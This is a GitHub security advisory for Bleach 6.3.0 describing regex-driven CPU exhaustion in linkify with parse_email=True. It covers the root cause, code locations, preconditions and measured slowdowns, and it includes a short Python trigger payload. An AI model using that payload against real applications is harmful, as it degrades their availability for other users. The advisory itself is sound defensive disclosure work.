Skip to content

Bleach linkify(parse_email=True) CPU exhaustion via unbounded email regex scanning

Moderate severity GitHub Reviewed Published Jun 5, 2026 in mozilla/bleach • Updated Jun 16, 2026

Package

pip bleach (pip)

Affected versions

= 6.3.0

Patched versions

None

Description

Summary

Bleach 6.3.0 exposes a documented email-linkification path through bleach.linkify(..., parse_email=True). The implementation scans attacker-controlled text with EMAIL_RE.finditer() over the full character token and has no length, timeout, or linear prefilter before applying the dot-atom email regex. A non-email payload around 30 KB causes multi-second CPU consumption per request/call, creating a direct availability risk for applications that enable email linkification on user-submitted text.

Affected Product

  • Package: bleach
  • Ecosystem: pip
  • Affected versions: verified in 6.3.0; exact first affected version not established
  • Patched versions: none known at finalization time
  • Tested version: 6.3.0
  • Audit commit/tag: v6.3.0 / 5546d5dbce60d08ccb99d981778d74044d646d4e
  • PyPI sdist SHA256: 6f3b91b1c0a02bb9a78b5a454c92506aa0fdf197e1d5e114d2e00c6f64306d22

Vulnerability Details

  • CWE: CWE-1333: Inefficient Regular Expression Complexity; related availability impact maps to CWE-400
  • Component: bleach/linkifier.py, build_email_re(), LinkifyFilter.handle_email_addresses()
  • Root cause: handle_email_addresses() calls self.email_re.finditer(text) on attacker-controlled text. EMAIL_RE includes a repeated dot-atom local-part pattern, so non-email strings such as repeated a. segments with no @ force repeated long failing scans.
  • Security boundary violated: user-submitted text processed by a documented safe linkification helper should not allow an attacker to impose superlinear CPU cost through non-email text.
  • Direct impact: per-request CPU exhaustion / denial-of-service risk in applications that enable parse_email=True on attacker-controlled text.
  • Chain impact, if any: one proof run observed an unrelated /health request delayed during a concurrent attack request, but this was not reliable across reviewer retests. Treat cross-request service degradation as environment-dependent supporting evidence, not the primary impact.
  • Severity estimate: Medium / availability-only. The feature is opt-in and deployment body limits/timeouts affect practical severity.

Relevant code path:

  • bleach/__init__.py:85-125: public linkify(text, ..., parse_email=False) constructs Linker(..., parse_email=parse_email) and calls linker.linkify(text).
  • bleach/linkifier.py:77-88: EMAIL_RE is compiled from the dot-atom email pattern.
  • bleach/linkifier.py:292-301: handle_email_addresses() applies self.email_re.finditer(text) to each character token.
  • bleach/linkifier.py:620-623: character tokens are routed into email handling only when parse_email is true.
  • docs/goals.rst:30-40: Bleach documents user comments, profile bios, and descriptions as target untrusted text use cases.
  • docs/linkify.rst:300-305: parse_email=True is the documented option for creating mailto: links.

Attack Preconditions

  • The consuming application enables the documented parse_email=True option, for example bleach.linkify(user_text, parse_email=True) or Linker(parse_email=True).linkify(user_text).
  • The attacker can submit text that reaches that linkification path. Authentication depends on the host application; a public comment form would make this unauthenticated, while account-only text fields require user privileges.
  • The application allows roughly 20-30 KB of text to reach Bleach and lacks a strict timeout or input cap before linkification.
  • No custom bounded email_re is supplied.

Reproduction

Minimal API trigger:

import bleach
payload = ("a." * 15000) + "a"
bleach.linkify(payload, parse_email=True)

The saved HTTP proof uses a local harness with POST /preview calling bleach.linkify(request_body, parse_email=True) and a control endpoint using parse_email=False on the same payload. The exploit sends baseline/control/attack requests over HTTP to 127.0.0.1.

Proof Evidence

The proof ran against Bleach 6.3.0 installed from the audited local checkout in an isolated temporary venv. It used Python 3.12.3 on Linux.

Measured HTTP proof results:

  • Payload: ("a." * 15000) + "a" (30001 bytes)
  • Normal baseline /preview mean: 0.001425 seconds
  • Same 30 KB payload with parse_email=False: 0.048349 seconds
  • Attack payload with parse_email=True: 8.719818 seconds
  • Slowdown versus the larger baseline/control mean: 180.35x
  • Requests sent by proof: 20

Evidence files:
poc.py
poc_results.json
exploit_proof.py
exploit_results.json

Scope and Limitations

  • This report does not claim XSS, authentication bypass, data disclosure, remote code execution, persistent crash, or persistent service outage.
  • parse_email=True is not the default. The affected path is a documented opt-in feature.
  • The exact first affected version is not established.
  • Practical impact depends on host application input limits, worker model, request timeout policy, and whether untrusted users can submit text to an email-linkification path.
  • A reviewer reproduced the direct CPU cost but did not reproduce the proof harness’s /health delay. The direct impact claim is therefore limited to per-request CPU exhaustion.
  • Bleach is marked deprecated in README.rst, and SECURITY.md has stale supported-version text, but the package still has a 2025 PyPI release and published Mozilla security reporting routes.

References

@willkg willkg published to mozilla/bleach Jun 5, 2026
Published to the GitHub Advisory Database Jun 16, 2026
Reviewed Jun 16, 2026
Last updated Jun 16, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
Low

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

EPSS score

Weaknesses

Inefficient Regular Expression Complexity

The product uses a regular expression with an inefficient, possibly exponential worst-case computational complexity that consumes excessive CPU cycles. Learn more on MITRE.

CVE ID

No known CVE

GHSA ID

GHSA-g75f-g53v-794x

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.